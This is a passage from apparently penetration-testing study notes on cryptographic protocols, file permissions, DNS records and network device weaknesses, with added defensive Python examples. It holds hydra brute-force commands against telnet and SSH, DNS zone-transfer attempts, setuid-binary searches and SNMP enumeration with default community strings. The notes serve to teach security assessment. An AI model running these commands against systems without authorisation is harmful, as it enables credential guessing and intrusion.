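        print(f"HMAC-{name.upper()} ({len(tag) * 8} bits): {tag.hex()}  "
              f"stdlib agrees: {matches_stdlib(DEMO_KEY, DEMO_MESSAGE, name)}")
    # Changing one byte of the message invalidates the tag.
    tag = hmac_from_scratch(DEMO_KEY, DEMO_MESSAGE)
    print("tampered message verifies:", verify_tag(DEMO_KEY, DEMO_MESSAGE.replace(b"100", b"900"), tag))
```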

B12) Applications of Cryptography

Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), both frequently referred to as
"SSL", are cryptographic protocols that provide communications security over a computer network.
When secured by TLS, connections between a client (e.g., a web browser) and a server (e.g., wikipedia.org)
have one or more of the following properties:
• The connection is private (or secure) because symmetric cryptography is used to encrypt the data
transmitted. The keys for this symmetric encryption are generated uniquely for each connection and are
based on a shared secret negotiated at the start of the session (see TLS handshake protocol). The server
and client negotiate the details of which encryption algorithm and cryptographic keys to use before the
first byte of data is transmitted (see Algorithm below). The negotiation of a shared secret is both secure
(the negotiated secret is unavailable to eavesdroppers and cannot be obtained, even by an attacker who
places themselves in the middle of the connection) and reliable (no attacker can modify the
communications during the negotiation without being detected).
• The identity of the communicating parties can be authenticated using public-key cryptography. This
authentication can be made optional, but is generally required for at least one of the parties (typically the
server).
• The connection ensures integrity because each message transmitted includes a message integrity check
using a message authentication code to prevent undetected loss or alteration of the data during
transmission.[1]:3

IPSec
Internet Protocol Security (IPsec) is a protocol suite for secure Internet Protocol (IP) communications that
works by authenticating and encrypting each IP packet of a communication session. IPsec includes protocols
for establishing mutual authentication between agents at the beginning of the session and negotiation of
cryptographic keys to be used during the session. IPsec can be used in protecting data flows between a pair of
hosts (host-to-host), between a pair of security gateways (network-to-network), or between a security
gateway and a host (network-to-host).[1] Internet Protocol security (IPsec) uses cryptographic security services
to protect communications over Internet Protocol (IP) networks. IPsec supports network-level peer
authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay
protection.

IPsec is an end-to-end security scheme operating in the Internet Layer of the Internet Protocol Suite, while
some other Internet security systems in widespread use, such as Transport Layer Security (TLS) and Secure
Shell (SSH), operate in the upper layers at the Transport Layer (TLS) and the Application layer (SSH). Hence,
only IPsec protects all application traffic over an IP network. Applications can be automatically secured by
IPsec at the IP layer.

Authentication Header (AH) is a member of the IPsec protocol suite. AH guarantees connectionless integrity
and data origin authentication of IP packets. Further, it can optionally protect against replay attacks by using
the sliding window technique and discarding old packets.

Encapsulating Security Payload (ESP) is a member of the IPsec protocol suite. In IPsec it provides
origin authenticity, integrity and confidentiality protection of packets. ESP also supports encryption-only
and authentication-only configurations, but using encryption without authentication is strongly discouraged
because it is insecure.

Secure Shell (SSH)


Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an
unsecured network.[1] The best known example application is for remote login to computer systems by users.

SSH provides a secure channel over an unsecured network in a client-server architecture, connecting an SSH
client application with an SSH server.[2] Common applications include remote command-line login and remote
command execution, but any network service can be secured with SSH. The protocol specification
distinguishes between two major versions, referred to as SSH-1 and SSH-2.

SSH was designed as a replacement for Telnet and for unsecured remote shell protocols such as the Berkeley
rlogin, rsh, and rexec protocols. Those protocols send information, notably passwords, in plaintext, rendering
them susceptible to interception and disclosure using packet analysis.

Pretty Good Privacy (PGP)


Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for
data communication. PGP is often used for signing, encrypting, and decrypting texts, e-mails, files, directories,
and whole disk partitions and to increase the security of e-mail communications. It was created by Phil
Zimmermann in 1991.[2]
PGP and similar software follow the OpenPGP standard (RFC 4880) for encrypting and decrypting data.

WEP
Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of
the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to
that of a traditional wired network.[1] WEP, recognizable by the key of 10 or 26 hexadecimal digits, was at one
time widely in use and was often the first security choice presented to users by router configuration tools.

In 2003 the Wi-Fi Alliance announced that WEP had been superseded by Wi-Fi Protected Access (WPA). In
2004, with the ratification of the full 802.11i standard (i.e. WPA2), the IEEE declared that both WEP-40 and
WEP-104 have been deprecated.

WEP was included as the privacy component of the original IEEE 802.11 standard ratified in 1997.[5][6] WEP
uses the stream cipher RC4 for confidentiality,[7] and the CRC-32 checksum for integrity.[8]

Standard 64-bit WEP uses a 40-bit key (also known as WEP-40), which is concatenated with a 24-bit
initialization vector (IV) to form the RC4 key. At the time that the original WEP standard was drafted, the U.S.
Government's export restrictions on cryptographic technology limited the key size. Once the restrictions were
lifted, manufacturers of access points implemented an extended 128-bit WEP protocol using a 104-bit key size
(WEP-104).

WPA
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security
certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance
defined these in response to serious weaknesses researchers had found in the previous system, Wired
Equivalent Privacy (WEP).

A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup, allows WPA and WPA2 security to be
bypassed and effectively broken in many situations.[2] WPA and WPA2 security implemented without using
the Wi-Fi Protected Setup feature are unaffected by the security vulnerability.
• WPA-Personal. Also referred to as WPA-PSK (pre-shared key) mode, this is designed for home and
small office networks and doesn't require an authentication server.[9] Each wireless network device
encrypts the network traffic using a 256-bit key. This key may be entered either as a string of 64
hexadecimal digits, or as a passphrase of 8 to 63 printable ASCII characters.[10] If ASCII characters are
used, the 256-bit key is calculated by applying the PBKDF2 key derivation function to the passphrase,
using the SSID as the salt and 4096 iterations of HMAC-SHA1.[11] WPA-Personal mode is available
with both WPA and WPA2.
• WPA-Enterprise. Also referred to as WPA-802.1X mode, and sometimes just WPA (as opposed to
WPA-PSK), this is designed for enterprise networks and requires a RADIUS authentication server. This
requires a more complicated setup, but provides additional security (e.g. protection against dictionary
attacks on short passwords). Various kinds of the Extensible Authentication Protocol (EAP) are used
for authentication. WPA-Enterprise mode is available with both WPA and WPA2.
• Wi-Fi Protected Setup (WPS). This is an alternative authentication key distribution method intended
to simplify and strengthen the process, but which, as widely implemented, creates a major security
hole via WPS PIN recovery.
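Worked example of the WPA-Personal key derivation described above (PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 256-bit key), added here and not part of the original notes. It accepts both input forms the text names (64 hex digits or an 8 to 63 character passphrase), enforces the length rules, and checks itself against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE"); function names are my own.

```python
import hashlib
import hmac
import re

PBKDF2_ITERATIONS = 4096   # HMAC-SHA1 rounds required by WPA/WPA2-Personal
PSK_BYTES = 32             # 256-bit pre-shared key


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit WPA-PSK from an ASCII passphrase, using the SSID as the salt."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA passphrase must be printable ASCII")
    ssid_bytes = ssid.encode("utf-8")
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1 to 32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid_bytes,
                               PBKDF2_ITERATIONS, PSK_BYTES)


def psk_from_config(secret: str, ssid: str) -> bytes:
    """Accept both forms the standard allows: 64 hex digits (raw key) or a passphrase."""
    if re.fullmatch(r"[0-9A-Fa-f]{64}", secret):
        return bytes.fromhex(secret)
    return derive_psk(secret, ssid)


def psk_matches(secret: str, ssid: str, expected_psk_hex: str) -> bool:
    """Constant-time comparison of a configured secret against a stored PSK."""
    return hmac.compare_digest(psk_from_config(secret, ssid),
                               bytes.fromhex(expected_psk_hex))


# Published IEEE 802.11i test vector (used here as a self-check, not taken from the notes).
IEEE_VECTOR = ("password", "IEEE",
               "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

if __name__ == "__main__":
    pw, ssid, expected = IEEE_VECTOR
    print("vector ok:", derive_psk(pw, ssid).hex() == expected)
    # Same passphrase on a different SSID gives a different PSK, because the SSID is the salt.
    print("ssid is salt:", derive_psk(pw, "OtherSSID") != derive_psk(pw, ssid))
```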

TKIP (Temporal Key Integrity Protocol)

TKIP is an encryption protocol. The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it
dynamically generates a new key for each packet. Used by WPA.

B13) File System Permissions

Unix
• https://www.ics.uci.edu/computing/linux/file-security.php
• https://en.wikipedia.org/wiki/File_system_permissions#Notation_of_traditional_Unix_permissions

o chmod is used to change file permissions
o ls -l can be used to show file permissions
o Show file permissions in octal
▪ Linux: # stat -c "%a %n" *
2755 test.txt
▪ Mac OS X: # stat -f '%A %a %N' test.txt
2755 test.txt

Set-user Identification (SUID): When a command or script with the SUID bit set is run, its effective UID becomes
that of the owner of the file, rather than that of the user who is running it (a file owned by root is executed as root
even when a non-root user starts it). The SUID permission symbol is s for the owner.

• chmod 4755 test.txt
• ls -alh test.txt
-rwsr-xr-x 1 sven staff 8B Aug 3 19:12 test.txt
• Find setuid binaries (-perm -4000 requires the setuid bit; the older +6000 form is deprecated in GNU find)
• find / -perm -4000 -type f -exec ls -ld {} \; > setuid.txt &
• Find setuid or setgid binaries (/6000 matches files with either bit set)
• find / -perm /6000 -type f > setuid_or_setgid.txt &

Set-group identification (SGID): When a file with SGID is executed, the resulting process will assume the group
ID given to the group class. When SGID permission is set on a directory, files created in the directory belong to
the group of which the directory is a member. The SGID permission symbol is s for the group.

• chmod 2755 test.txt
• ls -alh test.txt
-rwxr-sr-x 1 sven staff 8B Aug 3 19:12 test.txt

sticky bit: Sticky Bit is used for directories to protect files within them. Files in a directory with the sticky bit set
can only be deleted or renamed by the root user or the owner of the directory. The sticky bit permission
symbol is t.

• chmod +t testDir OR chmod 1755 testDir
• ls -alh testDir
total 0
drwxr-xr-t 2 sven staff 68B Aug 3 19:15 .
drwx------+ 103 sven staff 3.4K Aug 3 19:15 ..
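Added example (not from the notes) that turns ls -l mode strings like the ones shown above into the octal form chmod accepts and flags SUID, SGID, sticky and world-writable combinations; the sample listing lines are constructed and the function names are my own.

```python
import stat

_TYPE_CHARS = {"-": stat.S_IFREG, "d": stat.S_IFDIR, "l": stat.S_IFLNK, "c": stat.S_IFCHR,
               "b": stat.S_IFBLK, "p": stat.S_IFIFO, "s": stat.S_IFSOCK}
_RWX_BITS = (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
             stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
             stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH)
# Position in the 9-character permission part -> (special bit, letter ls prints for it).
_SPECIAL = {2: (stat.S_ISUID, "s"), 5: (stat.S_ISGID, "s"), 8: (stat.S_ISVTX, "t")}


def parse_mode_string(mode: str) -> int:
    """Convert a 10-character ls -l mode string such as '-rwsr-xr-x' to a numeric st_mode."""
    if len(mode) != 10 or mode[0] not in _TYPE_CHARS:
        raise ValueError(f"not an ls -l mode string: {mode!r}")
    result = _TYPE_CHARS[mode[0]]
    for i, ch in enumerate(mode[1:]):
        if ch == "-":
            continue
        if ch == "rwx"[i % 3]:
            result |= _RWX_BITS[i]
        elif i in _SPECIAL and ch.lower() == _SPECIAL[i][1]:
            # lower case (s/t): special bit AND execute; upper case (S/T): special bit only
            result |= _SPECIAL[i][0]
            if ch.islower():
                result |= _RWX_BITS[i]
        else:
            raise ValueError(f"unexpected {ch!r} at position {i + 1} in {mode!r}")
    return result


def octal_mode(mode: str) -> str:
    """Return the 4-digit octal form chmod accepts, e.g. '-rwsr-xr-x' -> '4755'."""
    return f"{stat.S_IMODE(parse_mode_string(mode)):04o}"


def flag_risky_entry(ls_line: str) -> list:
    """Inspect one ls -l line (name without spaces assumed) and report privileged bits."""
    fields = ls_line.split()
    st_mode = parse_mode_string(fields[0])
    name = fields[-1]
    findings = []
    if st_mode & stat.S_ISUID:
        findings.append(f"{name}: setuid, runs with the owner's UID")
    if st_mode & stat.S_ISGID and stat.S_ISDIR(st_mode):
        findings.append(f"{name}: setgid directory, new files inherit the directory's group")
    elif st_mode & stat.S_ISGID:
        findings.append(f"{name}: setgid, runs with the owning group's GID")
    if st_mode & stat.S_ISVTX and stat.S_ISDIR(st_mode):
        findings.append(f"{name}: sticky directory, only owner/root may delete entries")
    if st_mode & stat.S_IWOTH and st_mode & (stat.S_ISUID | stat.S_ISGID):
        findings.append(f"{name}: world-writable privileged file, any user can replace its contents")
    return findings


# Constructed sample lines in the shape of the ls -alh output shown above.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 sven staff 8B Aug 3 19:12 test.txt
-rwxr-sr-x 1 sven staff 8B Aug 3 19:12 group_tool
drwxr-xr-t 2 sven staff 68B Aug 3 19:15 testDir
-rwsrwxrwx 1 root root 16K Aug 3 19:20 broken_helper
"""


def audit_listing(listing: str) -> list:
    """Run flag_risky_entry over every entry of an ls -l listing, skipping the 'total' line."""
    findings = []
    for line in listing.splitlines():
        if line and not line.startswith("total"):
            findings.extend(flag_risky_entry(line))
    return findings


if __name__ == "__main__":
    for finding in audit_listing(SAMPLE_LISTING):
        print(finding)
```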

Windows
http://www.online-tech-tips.com/computer-tips/set-file-folder-permissions-windows/
http://stackoverflow.com/questions/2928738/how-to-grant-permission-to-users-for-a-directory-using-command-line-in-windows
https://technet.microsoft.com/en-us/library/cc753525(WS.10).aspx
• icacls

Examples:
• icacls c:\windows\* /save AclFile /T
- Will save the ACLs for all files under c:\windows and its subdirectories to AclFile.

• icacls c:\windows\ /restore AclFile
- Will restore the ACLs for every file within AclFile that exists in c:\windows and its subdirectories.

• icacls file /grant Administrator:(D,WDAC)
- Will grant the user Administrator Delete and Write DAC permissions to file.

• icacls file /grant *S-1-1-0:(D,WDAC)
- Will grant the user defined by sid S-1-1-0 Delete and Write DAC permissions to file.

• Show ACL of a directory
PS C:\Users\Sven\Desktop> icacls.exe .
. NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
WIN8\Sven:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files

• Show ACL of a single file. All three users have full access (F)
PS C:\Users\Sven\Desktop> icacls.exe .\README.txt
.\README.txt NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN8\Sven:(F)
Successfully processed 1 files; Failed processing 0 files

A sequence of simple rights:
F (full access)
M (modify access)
RX (read and execute access)
R (read-only access)
W (write-only access)

Specific rights:
D (delete)
RC (read control)
WDAC (write DAC), i.e. permission to change the object's discretionary access control list and so rewrite its
permissions.
WO (write owner)
S (synchronize)
AS (access system security)
MA (maximum allowed)
GR (generic read)
GW (generic write)
GE (generic execute)
GA (generic all)
RD (read data/list directory)
WD (write data/add file)
AD (append data/add subdirectory)
REA (read extended attributes)
WEA (write extended attributes)
X (execute/traverse)
DC (delete child)
RA (read attributes)
WA (write attributes)

Inheritance rights may precede either Perm form, and they are applied only to directories:
(OI): object inherit
(CI): container inherit
(IO): inherit only
(NP): do not propagate inherit
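Added example (not from the notes or from Microsoft) that parses icacls output of the shape shown above into principal, inheritance flags and rights, then flags allow ACEs granting broad principals any write-capable right (the review a practitioner does on a share or install directory). The path, accounts and ACEs in the sample are constructed, and a path without spaces is assumed.

```python
import re

# ACE tokens that describe inheritance rather than access rights.
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple and specific rights that let a principal change content, permissions or ownership.
WRITE_CAPABLE = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DC", "WDAC", "WO", "GW", "GA"}
# Principals that stand for "everyone" rather than a specific account (lower-cased for matching).
BROAD_PRINCIPALS = {"everyone", "*s-1-1-0", "builtin\\users", "nt authority\\authenticated users"}

_ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<parens>(?:\([^()]*\))+)$")


def parse_icacls_output(text: str) -> list:
    """Parse icacls output into one dict per ACE (assumes the path contains no spaces)."""
    aces = []
    path = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if line[0].isspace():
            rest = line.strip()               # continuation line: ACE only
        else:
            path, rest = line.split(None, 1)  # first line: path, then the first ACE
        m = _ACE_RE.match(rest)
        if not m:
            raise ValueError(f"unrecognised ACE line: {line!r}")
        tokens = re.findall(r"\(([^()]*)\)", m.group("parens"))
        inherit = [t for t in tokens if t in INHERITANCE_FLAGS]
        ace_type = "deny" if "DENY" in tokens else "allow"
        rights = []
        for t in tokens:
            if t not in INHERITANCE_FLAGS and t != "DENY":
                rights.extend(r.strip() for r in t.split(","))  # "(D,WDAC)" -> D, WDAC
        aces.append({"path": path, "principal": m.group("principal"),
                     "type": ace_type, "inherit": inherit, "rights": rights})
    return aces


def find_risky_aces(aces: list) -> list:
    """Return allow ACEs that give a broad principal any write-capable right."""
    return [a for a in aces
            if a["type"] == "allow"
            and a["principal"].lower() in BROAD_PRINCIPALS
            and set(a["rights"]) & WRITE_CAPABLE]


# Constructed sample in the shape of the icacls output shown above (path and accounts are made up).
SAMPLE_OUTPUT = r"""C:\App NT AUTHORITY\SYSTEM:(OI)(CI)(F)
       BUILTIN\Administrators:(OI)(CI)(F)
       Everyone:(OI)(CI)(M)
       WIN8\Sven:(OI)(CI)(RX)
       *S-1-1-0:(D,WDAC)
       BUILTIN\Users:(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for ace in find_risky_aces(parse_icacls_output(SAMPLE_OUTPUT)):
        print(f"{ace['path']}: {ace['principal']} has {','.join(ace['rights'])}")
```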

Registry:

List ACL information of files and registry keys:
http://www.windowsnetworking.com/kbase/WindowsTips/Windows8/AdminTips/easy-way-list-acl-information-file-or-registry-keys.html

o Read ACL of Registry Key:

• Access to Registry (query, edit etc.) with other tools:
o regedit.exe
o reg.exe

B14) Audit Techniques

Windows listing processes with network sockets:
TCPView from SysInternals or on the command line:
# netstat -a -o -n -b

Unix
# netstat -tulpen (Linux)
# lsof (Solaris)

Assessing Patch Level

• Windows: The Microsoft Baseline Security Analyzer (MBSA)
• Unix: /usr/lib/update-notifier/apt-check 2>&1 | cut -d ';' -f 2 (list pending security updates on Debian
based systems)

2) Background Information Gathering and Open Source

C1) Registration Records

➜ ~ whois vantagepoint.sg
----------------------------------------------------------------------
SGNIC WHOIS Server
----------------------------------------------------------------------
The following data is provided for information purposes only.
Registrar: INSTRA CORPORATION PTY. LTD.
Domain Name: VANTAGEPOINT.SG
Creation Date: 26-Feb-2014 04:43:30
Modified Date: 20-Mar-2014 08:31:04
Expiration Date: 26-Feb-2018 04:43:30
Domain Status: OK
Domain Status: VerifiedID@SG-Mandatory
Domain Status: VerifiedID@SG-OK (VERIFIED BY ADMIN CONTACT)

Registrant:
Name: VANTAGE POINT SECURITY PTE. LTD. (SGNIC-ORG1350730)
Administrative Contact:
Name: JACQUELINE LOW (SGNIC-PER20054416)
Technical Contact:
Name: VANTAGE POINT SECURITY PTE. LTD. (SGNIC-ORG1350731)
Email: [email protected]
Name Servers:
NS1.INSTRADNS.COM
NS2.INSTRADNS.COM
NS3.INSTRADNS.COM
DNSSEC:
unsigned

C2) Domain Name Server (DNS)


DNS Zone transfer (manually)
DNS Zone transfer is the process where a DNS server passes a copy of part of its database (which is called a
"zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about
a particular zone; there is a Master DNS server, and one or more Slave DNS servers, and the slaves ask the
master for a copy of the records for that zone.

A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a slave and ask the master for a
copy of the zone records. And it sends you them.
• Successful Zone Transfer:
o dig @ns1.sedoparking.com avhackers.com axfr
o dig @server domain axfr

• Zone Transfer Failed:
o dig @ns1.google.com google.com axfr

DNS Resource Records (RR)

Sample dig request. The output can be interpreted as:

vantagepoint.sg. 21571 IN A 184.95.38.200

• vantagepoint.sg. is the name being returned.
• 21571 is a 32-bit value: the Time to Live in seconds (range is 1 to 2147483647), which indicates how long the
RR may be cached. The value zero indicates the data should not be cached.
• IN is a 16-bit value which defines the protocol family or an instance of the protocol. The normal value is
IN = Internet protocol (other values are HS and CH, both historic MIT protocols).
• A is the Resource Record type. See below for samples.
• 184.95.38.200 is the IP address.

Zone DNS database is a collection of resource records and each of the records provides information about a
specific object. A list of most common records is provided below:
• SRV Record (SRV)
A Service record (SRV record) is a specification of data in the Domain Name System defining the
location, i.e. the hostname and port number, of servers for specified services.

• A SRV record has the form:
o _service._proto.name. TTL class SRV priority weight port target.
o service: the symbolic name of the desired service.
o proto: the transport protocol of the desired service; this is usually either TCP or UDP.
o name: the domain name for which this record is valid, ending in a dot.
o TTL: standard DNS time to live field.
o class: standard DNS class field (this is always IN).
o priority: the priority of the target host, lower value means more preferred.
o weight: A relative weight for records with the same priority, higher value means more
preferred.
o port: the TCP or UDP port on which the service is to be found.
o target: the canonical hostname of the machine providing the service, ending in a dot.

An example SRV record in textual form that might be found in a zone file might be the following:

_sip._tcp.example.com. 86400 IN SRV 0 5 5060 sipserver.example.com.

This points to a server named sipserver.example.com listening on TCP port 5060 for Session Initiation Protocol
(SIP) protocol services. The
priority given here is 0, and the weight is 5. As in MX records, the target in SRV records must point to
hostname with an address record (A or AAAA record). Pointing to a hostname with a CNAME record is not a
valid configuration.
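Added example (not from the notes) covering both the dig answer fields explained above and the SRV format: it parses NAME TTL CLASS TYPE RDATA lines, extracts SRV priority, weight, port and target, and orders targets the way RFC 2782 prescribes (lowest priority first, weighted random within a priority, a target of "." meaning the service is not offered). The vantagepoint.sg line mirrors the dig output above; the other answer lines are constructed and the function names are my own.

```python
import random
from dataclasses import dataclass

MAX_TTL = 2147483647
KNOWN_CLASSES = {"IN", "CH", "HS"}


@dataclass
class ResourceRecord:
    name: str
    ttl: int
    rr_class: str
    rr_type: str
    rdata: list


@dataclass
class SrvTarget:
    priority: int
    weight: int
    port: int
    target: str


def parse_rr_line(line: str) -> ResourceRecord:
    """Parse one dig-style answer line: NAME TTL CLASS TYPE RDATA..."""
    fields = line.split()
    if len(fields) < 5:
        raise ValueError(f"too few fields in RR line: {line!r}")
    name, ttl, rr_class, rr_type, *rdata = fields
    ttl = int(ttl)
    if not 0 <= ttl <= MAX_TTL:
        raise ValueError(f"TTL out of range: {ttl}")
    if rr_class not in KNOWN_CLASSES:
        raise ValueError(f"unknown class: {rr_class}")
    if not name.endswith("."):
        raise ValueError(f"owner name is not fully qualified: {name}")
    return ResourceRecord(name, ttl, rr_class, rr_type.upper(), rdata)


def parse_srv(rr: ResourceRecord) -> SrvTarget:
    """Extract priority, weight, port and target from an SRV record."""
    if rr.rr_type != "SRV" or len(rr.rdata) != 4:
        raise ValueError(f"not an SRV record: {rr}")
    priority, weight, port, target = rr.rdata
    if not target.endswith("."):
        raise ValueError(f"SRV target is not fully qualified: {target}")
    return SrvTarget(int(priority), int(weight), int(port), target)


def srv_service_and_proto(name: str) -> tuple:
    """Split an SRV owner name such as '_sip._tcp.example.com.' into ('sip', 'tcp')."""
    labels = name.split(".")
    if len(labels) < 3 or not (labels[0].startswith("_") and labels[1].startswith("_")):
        raise ValueError(f"not an SRV owner name: {name}")
    return labels[0][1:], labels[1][1:]


def order_srv_targets(targets: list, rng=None) -> list:
    """Order SRV targets as RFC 2782 says a client should try them."""
    rng = rng or random.Random()
    ordered = []
    for priority in sorted({t.priority for t in targets}):
        # A target of "." means the service is explicitly not available at that name.
        pool = [t for t in targets if t.priority == priority and t.target != "."]
        while pool:
            pool.sort(key=lambda t: t.weight != 0)   # weight-0 entries go first
            pick = rng.randint(0, sum(t.weight for t in pool))
            running = 0
            for candidate in pool:
                running += candidate.weight
                if running >= pick:                  # first running sum >= random pick wins
                    break
            ordered.append(candidate)
            pool.remove(candidate)
    return ordered


# Constructed answer lines (the first mirrors the dig output shown above).
SAMPLE_ANSWERS = [
    "vantagepoint.sg. 21571 IN A 184.95.38.200",
    "_sip._tcp.example.com. 86400 IN SRV 0 5 5060 sipserver.example.com.",
    "_sip._tcp.example.com. 86400 IN SRV 0 5 5060 sip2.example.com.",
    "_sip._tcp.example.com. 86400 IN SRV 10 0 5060 backup.example.com.",
]

if __name__ == "__main__":
    records = [parse_rr_line(line) for line in SAMPLE_ANSWERS]
    srvs = [parse_srv(r) for r in records if r.rr_type == "SRV"]
    print([t.target for t in order_srv_targets(srvs)])
```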

Address Mapping records (A)

The A record specifies the IPv4 address for a given host. A records are used for conversion of domain names to
corresponding IP addresses.

IP Version 6 Address records (AAAA)

The AAAA record (also quad-A record) specifies the IPv6 address for a given host. It works the same way as the A
record; the difference is the type of IP address.

Canonical Name records (CNAME)


A Canonical Name record (abbreviated as CNAME record) is a type of resource record in the Domain Name
System (DNS) used to specify that a domain name is an alias for another domain, which is the "canonical"
domain. All information, including subdomains, IP addresses, etc., is defined by the canonical domain.

This can prove convenient when running multiple services (like an FTP server and a webserver; each running
on different ports) from a single IP address. One can, for example, point ftp.example.com and
www.example.com to the DNS entry for example.com, which in turn has an A record which points to the IP
address. Then, if the IP address ever changes, one only has to record the change in one place within the
network: in the DNS A record for example.com.
CNAME records must always point to another domain name, never directly to an IP address.

Host Information records (HINFO)


HINFO records are used to acquire general information about a host. The record specifies type of CPU and OS.
The HINFO record data provides the possibility to use operating system specific protocols when two hosts
want to communicate. For security reasons the HINFO records are not typically used on public servers.

Note: Standard values in RFC 1010

Integrated Services Digital Network records (ISDN)


The ISDN resource record specifies the ISDN address for a host. An ISDN address is a telephone number that
consists of a country code, a national destination code, an ISDN Subscriber number and, optionally, an ISDN
subaddress. The function of the record is only a variation of the A resource record function.

Mail exchanger record (MX)


The MX resource record specifies a mail exchange server for a DNS domain name. The information is used by
Simple Mail Transfer Protocol (SMTP) to route emails to the proper hosts. Typically, there is more than one mail
exchange server for a DNS domain and each of them has a set priority.

Example:
msn.com MX preference = 5, mail exchanger = mx2.hotmail.com
msn.com MX preference = 5, mail exchanger = mx3.hotmail.com
msn.com MX preference = 5, mail exchanger = mx4.hotmail.com
msn.com MX preference = 5, mail exchanger = mx1.hotmail.com

msn.com nameserver = ns3.msft.net
msn.com nameserver = ns5.msft.net
msn.com nameserver = ns4.msft.net
msn.com nameserver = ns1.msft.net
msn.com nameserver = ns2.msft.net

Name Server records (NS)


The NS record specifies an authoritative name server for given host.

Reverse-lookup Pointer records (PTR)


As opposed to forward DNS resolution (A and AAAA DNS records), the PTR record is used to look up domain
names based on an IP address.

Start of Authority records (SOA)


The record specifies core information about a DNS zone, including the primary name server, the email of the
domain administrator, the domain serial number, and several timers relating to refreshing the zone.

Text records (TXT)

The text record can hold an arbitrary unformatted text string. Typically, the record is used by Sender Policy
Framework (SPF) to prevent fake emails from appearing to be sent by you.

C3) Customer Web Site Analysis

C4) Google Hacking and Web Enumeration

C5) NNTP Newsgroups and Mailing Lists

C6) Information Leakage from Mail & News Headers

3) Networking Equipment

D1) Management Protocols

Weaknesses
• Telnet Weaknesses:
o Not encrypted (plaintext communication), this means username and password are also sent
unencrypted during login
o exploits available in metasploit
o Brute force attacks
▪ hydra -l admin -P passlist.txt 192.168.0.7 telnet
• Web based Protocols Weaknesses
o If HTTP is used, communication is plaintext, which means username and password are also sent
unencrypted during login
o All weaknesses in OWASP Top 10...
o Brute force attacks by using Burp intruder

• SSH Weaknesses
o Password authentication is prone to brute force attacks
▪ hydra -l admin -P passlist.txt 192.168.0.7 ssh
o exploits available in metasploit

• SNMP Weaknesses
o default values are used for community strings (public/private)
o SNMPv1 and version 2 are not encrypted, only version 3 supports encryption
o tools:
▪ snmpcheck -t 10.16.108.41 -c public
▪ snmpwalk -v1 -c public 10.10.1.224

• TFTP Weaknesses
o TFTP includes no login or access control mechanisms. Care must be taken when using TFTP
for file transfers where authentication, access control, confidentiality, or integrity checking
are needed. Note that those security services could be supplied above or below the layer at
which TFTP runs. Care must also be taken in the rights granted to a TFTP server process so as
not to violate the security of the server's file system. TFTP is often installed with controls
such that only files that have public read access are available via TFTP. Also listing, deleting,
renaming, and writing files via TFTP are typically disallowed. TFTP file transfers are NOT
RECOMMENDED where the inherent protocol limitations could raise insurmountable liability
concerns

• Cisco Reverse Telnet Weaknesses
o https://supportforums.cisco.com/document/69481/reverse-telnet-aux-portdocx
o Once connected to a port of the Cisco device, another device can be reached via a reverse
telnet session

• NTP Weaknesses (Security best practices)
o exploits available in metasploit

D2) Network Traffic Analysis

Network Sniffer:
In general, for network sniffers there is:

• <capture filter> packet filter in libpcap filter syntax. This is used to filter data that is saved into a pcap
or written to console, e.g.
o (port 80 or port 443) and not arp (capture ports 80 and 443, skip ARP; the parentheses are needed
because and binds tighter than or in libpcap syntax)
o host 192.168.0.1 (filter only for packets that are sent from or to this host)
o dst host 192.168.1.1 and (dst port 80 or dst port 443) (capture any packets with destination
IP 192.168.1.1 and destination port 80 or 443)
• <read filter> packet Read filter in Wireshark display filter syntax. This is used to filter data that is read
from a pcap, e.g.
o ip.addr==192.168.0.1 // show only packets that are sent from or to this IP
o tcp.port eq 25 or icmp // show only port 25 and ICMP packets

Tools:

• Wireshark
• tshark
o http://www.codealias.info/technotes/the_tshark_capture_and_filter_example_page
o https://hackertarget.com/tshark-tutorial-and-filter-examples/
▪ Write all packets to a file called test.pcap and apply a packet filter for ports 80 and
443 on interface en0. (-P will still show the output on the console even though all is
written to test.pcap)
▪ tshark -w test.pcap -f "port 80 or port 443" -i en0 -P // libpcap filter syntax
▪ Read test.pcap and apply a read filter to only show the IP address 192.168.0.101
▪ tshark -r test.pcap -Y "ip.addr==192.168.0.101" // Wireshark display filter
• Ettercap
o Man in the middle attack
o It is capable of intercepting traffic on a network segment, capturing passwords, and
conducting active eavesdropping against a number of common protocols.

D3) Network Protocols

Address Resolution Protocol (ARP)
In computer networking, ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which
an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally,
